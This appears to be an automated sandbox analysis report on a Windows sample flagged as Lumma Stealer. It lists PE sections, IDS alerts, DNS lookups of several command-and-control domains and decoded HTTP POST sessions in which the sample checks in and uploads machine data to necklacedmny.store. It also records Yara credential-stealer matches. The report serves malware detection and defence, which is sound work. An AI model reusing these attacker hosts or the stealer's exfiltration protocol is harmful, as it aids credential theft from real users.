IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(special chars) | 0x1000 | 0x58000 | 0x27e00 | 1e2b1907ad46eb6cf40f35095834c7d1 | False | 0.9978448275862069 | data | 7.971219963000856 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x59000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pbzdrecb | 0x5b000 | 0x2a9000 | 0x2a8800 | 6aad7a4544876ba0c2afe07223402923 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nwxoinbz | 0x304000 | 0x1000 | 0x400 | 0fb46c4c848c47e6fc23554bc319b8b1 | False | 0.7666015625 | data | 6.024108858331269 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x305000 | 0x3000 | 0x2200 | 5af1757f8b653181b2f1dc3b3a786cf9 | False | 0.04997702205882353 | DOS executable (COM) | 0.5289179869085167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T15:27:15.847011+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-29T15:27:15.847011+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-29T15:27:18.068779+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49715 | 188.114.96.3 | 443 | TCP
2024-10-29T15:27:18.068779+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49715 | 188.114.96.3 | 443 | TCP
2024-10-29T15:28:14.202045+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49979 | 188.114.96.3 | 443 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 15:27:14.304208994 CET | 192.168.2.7 | 1.1.1.1 | 0xc9aa | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.318176031 CET | 192.168.2.7 | 1.1.1.1 | 0x2511 | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.348839045 CET | 192.168.2.7 | 1.1.1.1 | 0x5bf6 | Standard query (0) | fadehairucw.store | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.531662941 CET | 192.168.2.7 | 1.1.1.1 | 0x17e0 | Standard query (0) | thumbystriw.store | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.606142044 CET | 192.168.2.7 | 1.1.1.1 | 0xeb1b | Standard query (0) | necklacedmny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 15:27:14.314141989 CET | 1.1.1.1 | 192.168.2.7 | 0xc9aa | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.330091953 CET | 1.1.1.1 | 192.168.2.7 | 0x2511 | Name error (3) | crisiwarny.store | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.358756065 CET | 1.1.1.1 | 192.168.2.7 | 0x5bf6 | Name error (3) | fadehairucw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.548540115 CET | 1.1.1.1 | 192.168.2.7 | 0x17e0 | Name error (3) | thumbystriw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.629604101 CET | 1.1.1.1 | 192.168.2.7 | 0xeb1b | No error (0) | necklacedmny.store | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 15:27:14.629604101 CET | 1.1.1.1 | 192.168.2.7 | 0xeb1b | No error (0) | necklacedmny.store | | 188.114.97.3 | A (IP address) | IN (0x0001) | false

• necklacedmny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49704 | 188.114.96.3 | 443 | 7636 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 14:27:15 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: necklacedmny.store
2024-10-29 14:27:15 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-29 14:27:15 UTC | 1011 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 14:27:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=eprkv669n1k439lhrcmih2kqau; expires=Sat, 22 Feb 2025 08:13:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3WigEmidnqswZgUgRfTpBL6qe5uDVGUSzTpDr7STNfKLZAJpfM1nkLKDYSMMPgCDEd8gfE87ykn%2FL4bEn34NMOozQiFTdSTfHtriTXROmfCl%2BrJjt04CnkPfVx0P3fTDOz0OUU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da3d8657f076b82-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1055&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=2623188&cwnd=251&unsent_bytes=0&cid=cb88714eb9625d95&ts=543&x=0"
2024-10-29 14:27:15 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-29 14:27:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49715 | 188.114.96.3 | 443 | 7636 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 14:27:16 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: necklacedmny.store
2024-10-29 14:27:16 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-29 14:27:18 UTC | 1019 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 14:27:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=o884h6sd9fmr86colat4gm1lo7; expires=Sat, 22 Feb 2025 08:13:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmY9P%2FrouZGvm7d3vHUPzR1GgNSWhkqOJYdRWYiN8v5dldwYB%2FQeDCuRj77H%2F5es9w6aHt81uu0bpVOyF0K%2BDH3xGL2HbfOxxp9EJDOo%2BylrAZLeYsY%2FPJ4fkr4U5rmU8sekWPc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da3d86d294a6c20-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=954&delivery_rate=2409317&cwnd=235&unsent_bytes=0&cid=d0be5ef44894dd9c&ts=509&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49721 | 188.114.96.3 | 443 | 7636 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 14:27:18 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12849
Host: necklacedmny.store
2024-10-29 14:27:18 UTC | 12849 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 37 45 32 35 46 43 32 43 34 43 39 38 42 37 42 33 39 38 39 42 36 36 39 31 43 37 37 43 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B57E25FC2C4C98B7B3989B6691C77C91--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-29 14:28:05 UTC | 1023 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 14:28:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=iint6jrdrdsqk7b3u1kg6dt4mb; expires=Sat, 22 Feb 2025 08:13:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVr8kZQ%2FMtMmGMJFZjmF5jIAX74ssXe4Kr%2B4epRyIOGsq3SJgett9qEZcaSuRzYglvLE%2BWRmX0jm2%2FyzVyLfggyNr1XN%2FRTWDf6eOcaARtOZECOcroAEYJRPMb9p82LnhfX%2FE8o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da3d87ac9e60bbe-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1597&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13791&delivery_rate=1776687&cwnd=32&unsent_bytes=0&cid=bbb06a1b25e0ac5e&ts=47121&x=0"
2024-10-29 14:28:05 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
Data Ascii: 11ok 173.254.250.72
2024-10-29 14:28:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49970 | 188.114.96.3 | 443 | 7636 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 14:28:06 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15081
Host: necklacedmny.store
2024-10-29 14:28:06 UTC | 15081 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 37 45 32 35 46 43 32 43 34 43 39 38 42 37 42 33 39 38 39 42 36 36 39 31 43 37 37 43 39 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B57E25FC2C4C98B7B3989B6691C77C91--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-29 14:28:07 UTC | 1019 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 14:28:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=9o9bflo6jcn6drmjvto091o62h; expires=Sat, 22 Feb 2025 08:14:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5LGbs4y8YYaI7EtWbmTRVVqu2T4z43XB2ZBPhWxJEthycxgQQXjLcR1dddzMbtItVMGW1SXukdRAdR8D92b2FD66GEatsZctI%2BtfBSoRx8M%2BAf4W8upO%2Fcuhpg0QOo6OCGFa%2BoQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da3d9a5ea60486b-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1941&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16023&delivery_rate=1638009&cwnd=237&unsent_bytes=0&cid=63b433071ec5ad6a&ts=629&x=0"
2024-10-29 14:28:07 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
Data Ascii: 11ok 173.254.250.72
2024-10-29 14:28:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.749977188.114.96.34437636C:\Users\user\Desktop\file.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-29 14:28:08 UTC284OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 20406
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:28:08 UTC | 15331 | OUT | Data Ascii (decoded from the captured raw bytes; the dump ends mid-field):
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="hwid"
                                                                                
                                                                                B57E25FC2C4C98B7B3989B6691C77C91
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="pid"
                                                                                
                                                                                3
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="lid"
                                                                                
                                                                                4SD0y4--legen
                                                                                2024-10-29 14:28:08 UTC | 5075 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:09 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 14:28:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=dn6tpsp8nkvkfjsa8rvb0o59f9; expires=Sat, 22 Feb 2025 08:14:47 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5n1OmLNChoXrmyvEBWlAksNY4miZW1OnQ1gJp%2FhaLf8vBeaZ39wt3xp0N4PIYwxWhmPryuFrgTXiy0ajsx7diFPKMtEFbkAdtInn%2FVsW87GlrHD3JX0N2kapDsDRXYO9wgtaJQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da3d9b09a807d5d-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1289&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21370&delivery_rate=1548663&cwnd=252&unsent_bytes=0&cid=5800e0facf834bb6&ts=752&x=0"
                                                                                2024-10-29 14:28:09 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                Data Ascii: 11ok 173.254.250.72
                                                                                2024-10-29 14:28:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                5 | 192.168.2.7 | 49979 | 188.114.96.3 | 443 | 7636 | C:\Users\user\Desktop\file.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-29 14:28:10 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 1213
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:28:10 UTC | 1213 | OUT | Data Ascii (decoded from the captured raw bytes; the dump ends mid-field):
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="hwid"
                                                                                
                                                                                B57E25FC2C4C98B7B3989B6691C77C91
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="pid"
                                                                                
                                                                                1
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="lid"
                                                                                
                                                                                4SD0y4--legen


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                6 | 192.168.2.7 | 49980 | 188.114.96.3 | 443 | 7636 | C:\Users\user\Desktop\file.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-29 14:28:15 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 550975
                                                                                Host: necklacedmny.store
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Ascii (decoded from the captured raw bytes; the dump ends mid-field):
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="hwid"
                                                                                
                                                                                B57E25FC2C4C98B7B3989B6691C77C91
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="pid"
                                                                                
                                                                                1
                                                                                --be85de5ipdocierre1
                                                                                Content-Disposition: form-data; name="lid"
                                                                                
                                                                                4SD0y4--legen
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:15 UTC | 15331 | OUT | Data Raw: [binary chunk, raw dump omitted]
                                                                                2024-10-29 14:28:53 UTC | 1022 | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 29 Oct 2024 14:28:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=dv8c47j7dlp6nfopsoahm41427; expires=Sat, 22 Feb 2025 08:14:56 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2su55bzddnIx%2BiW5O8%2BMbTnvG8idtx5WSt1VMa9N0oUyIl2MxhYM2cioNCMdIvuylVH5oVoQPtwXsxcGxRL2L5KdxKIlz9Jkq9c2MPx6oHlkEIsRvkmZzZ1ELjanwyOS%2FT241Q4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8da3d9dc6cc96c56-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=215&recv=597&lost=0&retrans=0&sent_bytes=2844&recv_bytes=553458&delivery_rate=2458404&cwnd=244&unsent_bytes=0&cid=f93939b5da2f9e18&ts=38227&x=0"



                                                                                Target ID: 0
                                                                                Start time: 10:27:12
                                                                                Start date: 29/10/2024
                                                                                Path: C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit): true
                                                                                Commandline: "C:\Users\user\Desktop\file.exe"
                                                                                Imagebase: 0xfd0000
                                                                                File size: 2'964'992 bytes
                                                                                MD5 hash: E8FEBBEE7F62CA4C85F34BCCB279EB67
                                                                                Has elevated privileges: true
                                                                                Has administrator privileges: true
                                                                                Programmed in: C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation: low
                                                                                Has exited: true

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, Offset: 01487000, based on PE: false
                                                                                  • Associated: 00000000.00000003.2340811577.0000000001487000.00000004.00000020.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: C:\W$C:\W
                                                                                  • API String ID: 0-2549618443
                                                                                  • Opcode ID: 356dcdae9940630e689e1572c087d1da334726962f6e8ad986fbde275b50ae75
                                                                                  • Instruction ID: d10a5f0688f8de4f6c1c024df6b41b1ce2179ce04534988d19ac6562b7401b07
                                                                                  • Opcode Fuzzy Hash: 356dcdae9940630e689e1572c087d1da334726962f6e8ad986fbde275b50ae75
                                                                                  • Instruction Fuzzy Hash: 8322542140E7D48FC7278B748969592BFB0EE2721075E46CFC5C18F9B3E228994AD763
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1897589782.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, Offset: 014DA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f219db0c2180ba8c01d2a115b34f446bffaf79651a876a82428fc51bf2641c1f
                                                                                  • Instruction ID: 0d90f134a332b6c923117f46a5eaf576982b6569d0acba4a381f0565e17015c2
                                                                                  • Opcode Fuzzy Hash: f219db0c2180ba8c01d2a115b34f446bffaf79651a876a82428fc51bf2641c1f
                                                                                  • Instruction Fuzzy Hash: 2BD1F06140E7D59FDB038B7489A96A57FB0EF03224B1A46DFC4C58F0B3E224994EC766
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1897589782.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, Offset: 014DA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_1487000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57e47e7fac1c5cb555f30c1572d05c56a31d33705dca18a2029d130cb5835b1b
                                                                                  • Instruction ID: 623c72978320fd2fc72d8ad957ec1de7064af578eeef20389e6dcce338dde659
                                                                                  • Opcode Fuzzy Hash: 57e47e7fac1c5cb555f30c1572d05c56a31d33705dca18a2029d130cb5835b1b
